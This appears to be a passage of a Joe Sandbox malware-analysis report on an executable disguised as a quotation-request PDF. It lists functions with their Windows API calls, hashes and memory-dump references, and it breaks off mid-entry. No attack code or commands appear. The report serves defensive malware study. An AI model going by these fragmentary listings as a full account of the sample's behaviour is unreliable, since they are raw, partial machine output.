                                                                    • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                    • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                                    Function 00448804 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                                    • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                    • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                    • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                    • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                    • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Enable$Show$MessageSend
                                                                    • String ID:
                                                                    • API String ID: 1871949834-0
                                                                    • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                    • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                                    • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                    • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                                    Function 00441078 Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                    • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                                    • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                    • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                                    Function 00471A38 Relevance: 9.1, APIs: 6, Instructions: 79windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                                    • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                                    • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                                    • SendMessageW.USER32 ref: 00471AE3
                                                                    • DestroyIcon.USER32(?), ref: 00471AF4
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                                    • String ID:
                                                                    • API String ID: 3611059338-0
                                                                    • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                    • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                                    • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                    • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                                    Function 00455616 Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: DestroyWindow$DeleteObject$IconMove
                                                                    • String ID:
                                                                    • API String ID: 1640429340-0
                                                                    • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                    • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                                    • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                    • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                                    Function 0044389A Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                    • _wcslen.LIBCMT ref: 004438CD
                                                                    • _wcslen.LIBCMT ref: 004438E6
                                                                    • _wcstok.LIBCMT ref: 004438F8
                                                                    • _wcslen.LIBCMT ref: 0044390C
                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                                    • _wcstok.LIBCMT ref: 00443931
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                                    • String ID:
                                                                    • API String ID: 3632110297-0
                                                                    • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                    • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                                    • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                    • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                                    Function 00455168 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                    • String ID:
                                                                    • API String ID: 752480666-0
                                                                    • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                    • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                                    • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                    • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                                    Function 004552FA Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                    • String ID:
                                                                    • API String ID: 3275902921-0
                                                                    • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                    • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                                    • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                    • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                                    Function 004556C8 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                    • String ID:
                                                                    • API String ID: 3275902921-0
                                                                    • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                    • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                                    • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                    • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                                    Function 004331A2 Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                    • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                    • String ID:
                                                                    • API String ID: 2833360925-0
                                                                    • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                    • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                                    • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                    • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                                    Function 004555A8 Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32 ref: 004555C7
                                                                    • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                                    • DeleteObject.GDI32(?), ref: 00455736
                                                                    • DeleteObject.GDI32(?), ref: 00455744
                                                                    • DestroyIcon.USER32(?), ref: 00455752
                                                                    • DestroyWindow.USER32(?), ref: 00455760
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                    • String ID:
                                                                    • API String ID: 3691411573-0
                                                                    • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                    • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                                                    • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                    • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                                                    Function 00447275 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                      • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                      • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                                    • LineTo.GDI32(?,?,?), ref: 004472AC
                                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                                    • LineTo.GDI32(?,?,?), ref: 004472C6
                                                                    • EndPath.GDI32(?), ref: 004472D6
                                                                    • StrokePath.GDI32(?), ref: 004472E4
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                    • String ID:
                                                                    • API String ID: 372113273-0
                                                                    • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                    • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                                    • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                    • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                                    Function 0044CC51 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 0044CC6D
                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDevice$Release
                                                                    • String ID:
                                                                    • API String ID: 1035833867-0
                                                                    • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                    • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                                    • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                    • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                                    Function 00417082 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __getptd.LIBCMT ref: 0041708E
                                                                      • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                      • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                    • __amsg_exit.LIBCMT ref: 004170AE
                                                                    • __lock.LIBCMT ref: 004170BE
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                                    • _free.LIBCMT ref: 004170EE
                                                                    • InterlockedIncrement.KERNEL32(033917F0), ref: 00417106
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                    • String ID:
                                                                    • API String ID: 3470314060-0
                                                                    • Opcode ID: 24516f4010ce0b93e8566e6a8de288d1d1524a4de8e6263f522fbb499f39661f
                                                                    • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                                    • Opcode Fuzzy Hash: 24516f4010ce0b93e8566e6a8de288d1d1524a4de8e6263f522fbb499f39661f
                                                                    • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                                    Function 0044B63B Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                                    • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                                      • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
